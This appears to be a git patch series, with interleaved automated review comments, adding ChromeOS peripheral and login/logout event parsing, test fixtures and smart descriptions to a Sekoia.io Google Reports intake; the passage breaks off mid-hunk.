@@ -278,3 +280,21 @@ stages: event.type: ["denied"] event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}' filter: '{{ json_event.message.events[0].name == "login_failure"}}' + + set_chrome_fields: + actions: + - set: + event.category: ["web"] + organization.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ORG_UNIT_NAME" %}{{param.value}}{% endif %}{% endfor %}' + event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "EVENT_REASON" %}{{param.value}}{% endif %}{% endfor %}' + device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}' + device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}' + device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}' + + - set: + event.type: ["change"] + filter: '{{ json_event.message.events[0].name == "CHROMEOS_PERIPHERAL_STATUS_UPDATED"}}' + + - set: + event.type: ["connection"] + filter: '{{ json_event.message.events[0].name in ["CHROME_OS_LOGOUT_EVENT", "CHROME_OS_LOGIN_EVENT"]}}' diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json new file mode 100644 index 000000000..36c42d3d5 --- /dev/null +++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json 
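Review bot: `set_chrome_fields` maps `PRODUCT_ID` to `device.id` and `PRODUCT_NAME` to `device.model.name`, but in the accompanying sample those parameters describe the attached USB peripheral (`0x2`, `2.0 root hub`, next to `VENDOR_ID`/`VENDOR_NAME`) while the ChromeOS endpoint is identified by `DIRECTORY_DEVICE_ID`, which the stage leaves unmapped, and `DEVICE_NAME`, which lands in `device.model.identifier`; anything that correlates on `device.id` will therefore group by peripheral model rather than by endpoint, so the intended semantics should be confirmed against the Google reports schema and recorded in `fields.yml` before rules rely on it. Separately, `event.category: ["web"]` with `event.type: ["connection"]` for `CHROME_OS_LOGIN_EVENT` and `CHROME_OS_LOGOUT_EVENT` does not fit ECS, where sign-in and sign-out are `authentication`/`session` events with types `start` and `end`, and `web`/`connection` describe HTTP and network traffic; the peripheral event is closer to `host` than `web`. The category and type blocks below replace the two trailing `set` actions; the first action's field mappings are unchanged.
```yaml
  set_chrome_fields:
    actions:
      - set:
          # … unchanged: organization.name / event.reason / device.* mappings …

      - set:
          event.category: ["host"]
          event.type: ["change"]
        filter: '{{ json_event.message.events[0].name == "CHROMEOS_PERIPHERAL_STATUS_UPDATED"}}'

      - set:
          event.category: ["authentication", "session"]
          event.type: ["start"]
        filter: '{{ json_event.message.events[0].name == "CHROME_OS_LOGIN_EVENT"}}'

      - set:
          event.category: ["authentication", "session"]
          event.type: ["end"]
        filter: '{{ json_event.message.events[0].name == "CHROME_OS_LOGOUT_EVENT"}}'
```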
@@ -0,0 +1,47 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + }, + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}" + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", + "event": { + "action": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "type": [ + "change" + ] + }, + "@timestamp": "2024-11-08T13:17:42.050000Z", + "cloud": { + "account": { + "id": "C01x70000" + } + }, + "device": { + "id": "0x2", + "model": { + "identifier": "S5NXNZ00A000000", + "name": "2.0 root hub" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097979777777" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json new file mode 100644 index 000000000..49574fa28 --- /dev/null +++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json 
@@ -0,0 +1,45 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + }, + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}" + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 
16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", + "event": { + "action": "CHROME_OS_LOGIN_EVENT", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": "CHROMEOS_KIOSK_SESSION_LOGIN", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-08T13:20:40Z", + "cloud": { + "account": { + "id": "C01x7c000" + } + }, + "device": { + "model": { + "identifier": "S5NXNZ00A000000" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097973333333333" + } + } +} \ No newline at end of file From 3221f63e4467bb80d815c9e37e2ce48f95f74b44 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 16:27:24 +0100 Subject: [PATCH 241/317] Apply linter --- Google Cloud/google-report/ingest/parser.yml | 2 +- Google Cloud/google-report/tests/test_chrome_sample_1.json | 4 ++-- Google Cloud/google-report/tests/test_chrome_sample_2.json | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index c92e4bf32..2dde85fdb 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -290,7 +290,7 @@ stages: device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}' device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}' device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}' - + - set: event.type: ["change"] filter: '{{ json_event.message.events[0].name == "CHROMEOS_PERIPHERAL_STATUS_UPDATED"}}' 
diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json index 36c42d3d5..e0e145d54 100644 --- a/Google Cloud/google-report/tests/test_chrome_sample_1.json +++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", "sekoiaio": { "intake": { "dialect": "Google Report", "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" } - }, - "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 
16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}" + } }, "expected": { "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json index 49574fa28..ecbf27de3 100644 --- a/Google Cloud/google-report/tests/test_chrome_sample_2.json +++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", "sekoiaio": { "intake": { "dialect": "Google Report", "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" } - }, - "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}" 
+ } }, "expected": { "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", From f2dd3b05166600bb2e7e6a91ba6fc89cbbc6e400 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 16:44:12 +0100 Subject: [PATCH 242/317] Fix smart desc --- Google Cloud/google-report/_meta/smart-descriptions.json | 8 +++++++- Google Cloud/google-report/ingest/parser.yml | 2 +- 2 files changed, 8 insertions(+), 2 deletions(-) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 82e74ecd7..b58cf816e 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -174,6 +174,13 @@ { "field": "network.application", "value": "context_aware_access" + }, + { + "field": "google.report.access.application" + } + ] + }, + { "value": "The {google.report.rule.type} action was completed with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}", "conditions": [ { 
@@ -263,7 +270,6 @@
"field": "event.action"
},
{
- "field": "google.report.access.application"
"field": "google.report.saml.application_name"
}
]
diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml
index f3b54b479..f928e2148 100644
--- a/Google Cloud/google-report/ingest/parser.yml
+++ b/Google Cloud/google-report/ingest/parser.yml
@@ -272,7 +272,7 @@ stages:
event.type: ["denied"]
device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_DEVICE_ID" %}{{param.value}}{% endif %}{% endfor %}'
google.report.access.application: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_APPLICATION" %}{{param.value}}{% endif %}{% endfor %}'
-
+
set_rules_fields:
actions:
- set:
From 1e5f81194e4fe8d0f69df8ea7d743b39d35fd469 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya
Date: Mon, 18 Nov 2024 10:47:49 +0100
Subject: [PATCH 243/317] Fix smart desc
---
Google Cloud/google-report/_meta/smart-descriptions.json | 6 ++++++
1 file changed, 6 insertions(+)
diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json
index b58cf816e..c1a559ed7 100644
--- a/Google Cloud/google-report/_meta/smart-descriptions.json
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json
@@ -177,6 +177,12 @@
},
{
"field": "google.report.access.application"
+ },
+ {
+ "field": "user.email"
+ },
+ {
+ "field": "event.action"
}
]
},
From 7478edd763b6ef7828fbc8cbf8e481b7aa1c2b1b Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya
Date: Mon, 18 Nov 2024 11:27:09 +0100
Subject: [PATCH 244/317] Fix smart desc
---
.../_meta/smart-descriptions.json | 22 -------------------
1 file changed, 22 deletions(-)
diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json
index c1a559ed7..a25527ef8 100644
--- a/Google Cloud/google-report/_meta/smart-descriptions.json
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json
@@ -293,9 +293,6 @@
},
{
"field": "user.email"
- },
- {
- "field": "google.report.saml.application_name"
}
]
},
@@ -334,25 +331,6 @@
}
]
},
- {
- "value": "User {user.email} failed to log in using {network.application} service : {event.reason}",
- "conditions": [
- {
- "field": "network.application",
- "value": "saml"
- },
- {
- "field": "event.action",
- "value": "login_failure"
- },
- {
- "field": "user.email"
- },
- {
- "field": "google.report.saml.application_name"
- }
- ]
- },
{
"value": "{source.ip} with ID {user.id} changing in the {network.application} application",
"conditions": [
From 65af5b12298e7c7884511b6f93260bf41fbc2b8b Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya
Date: Mon, 18 Nov 2024 11:41:54 +0100
Subject: [PATCH 245/317] Add some modification to the parser
---
.../google-report/_meta/smart-descriptions.json | 4 ++--
Google Cloud/google-report/ingest/parser.yml | 6 ++++--
.../google-report/tests/test_chrome_sample_1.json | 10 ++++++++--
.../google-report/tests/test_chrome_sample_2.json | 7 ++++---
4 files changed, 18 insertions(+), 9 deletions(-)
diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json
index 0ac5acfe5..0c49ccdf8 100644
--- a/Google Cloud/google-report/_meta/smart-descriptions.json
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json
@@ -283,7 +283,7 @@
]
},
{
- "value": "Device {device.model.name} with ID {device.id} is {event.action} in the {network.application} application",
+ "value": "Device {device.model.name} with model ID {device.model.identifier} is {event.action} in the {network.application} application",
"conditions": [
{
"field": "network.application",
@@ -297,7 +297,7 @@
"field": "device.model.name"
},
{
- "field": "device.id"
+ "field": "device.model.identifier"
}
]
},
diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml
index 2dde85fdb..e15db634e 100644
--- a/Google Cloud/google-report/ingest/parser.yml
+++ b/Google Cloud/google-report/ingest/parser.yml
@@ -287,9 +287,11 @@ stages:
event.category: ["web"]
organization.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ORG_UNIT_NAME" %}{{param.value}}{% endif %}{% endfor %}'
event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "EVENT_REASON" %}{{param.value}}{% endif %}{% endfor %}'
- device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}'
- device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}'
+ device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}'
+ host.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}'
device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}'
+ device.manufacturer: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "VENDOR_NAME" %}{{param.value}}{% endif %}{% endfor %}'
+ host.os.full: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_PLATFORM" %}{{param.value}}{% endif %}{% endfor %}'

- set:
event.type: ["change"]
diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json
index e0e145d54..6567eebf1 100644
--- a/Google Cloud/google-report/tests/test_chrome_sample_1.json
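Review bot: The new `device.manufacturer` and `device.model.identifier` mappings read VENDOR_NAME and PRODUCT_ID, which in the peripheral-status fixture describe the attached USB device ("2.0 root hub", "Linux Foundation"), while `host.name` and `host.os.full` now describe the ChromeOS machine itself; nothing in the stage says so, and a reader will naturally take `device.*` for the host. A comment above the `device.*` lines would settle it, e.g. `# device.* describes the reported peripheral (PRODUCT_*/VENDOR_*); host.* describes the ChromeOS device itself (DEVICE_NAME/DEVICE_PLATFORM)`. VENDOR_ID is left unmapped although its PRODUCT_ID counterpart is now extracted; if that is deliberate, the same comment should say so. The `set` action this hunk edits begins before the hunk.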
+++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json
@@ -28,12 +28,18 @@
}
},
"device": {
- "id": "0x2",
+ "manufacturer": "Linux Foundation",
"model": {
- "identifier": "S5NXNZ00A000000",
+ "identifier": "0x2",
"name": "2.0 root hub"
}
},
+ "host": {
+ "name": "S5NXNZ00A000000",
+ "os": {
+ "full": "ChromeOS 16033.51.0"
+ }
+ },
"network": {
"application": "chrome"
},
diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json
index ecbf27de3..990b7f47c 100644
--- a/Google Cloud/google-report/tests/test_chrome_sample_2.json
+++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json
@@ -27,9 +27,10 @@
"id": "C01x7c000"
}
},
- "device": {
- "model": {
- "identifier": "S5NXNZ00A000000"
+ "host": {
+ "name": "S5NXNZ00A000000",
+ "os": {
+ "full": "ChromeOS 16033.51.0"
}
},
"network": {
From 4c329f6eb9002b66e9c6bef52e60f7c1c340ecf0 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya
Date: Mon, 18 Nov 2024 12:27:34 +0100
Subject: [PATCH 246/317] Fix smart desc
---
.../_meta/smart-descriptions.json | 32 +++++++++++++++++--
1 file changed, 30 insertions(+), 2 deletions(-)
diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json
index 66d518071..81622bd9b 100644
--- a/Google Cloud/google-report/_meta/smart-descriptions.json
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json
@@ -352,7 +352,7 @@
]
},
{
- "value": "The user on device model {device.model.name} logged out due to {event.reason}",
+ "value": "The user with ID {user.id} on the {device.model.name} device logged out due to: {event.reason}",
"conditions": [
{
"field": "network.application",
@@ -367,11 +367,14 @@
},
{
"field": "device.model.name"
+ },
+ {
+ "field": "user.id"
}
]
},
{
- "value": "The user on device model {device.model.name} log in due to {event.reason}",
+ "value": "The user with id {user.id} on the {device.model.name} device log in : {event.reason}",
"conditions": [
{
"field": "network.application",
@@ -386,6 +389,31 @@
},
{
"field": "device.model.name"
+ },
+ {
+ "field": "user.id"
+ }
+ ]
+ },
+ {
+ "value": "The user with id {user.id} on the {host.name} host log in : {event.reason}",
+ "conditions": [
+ {
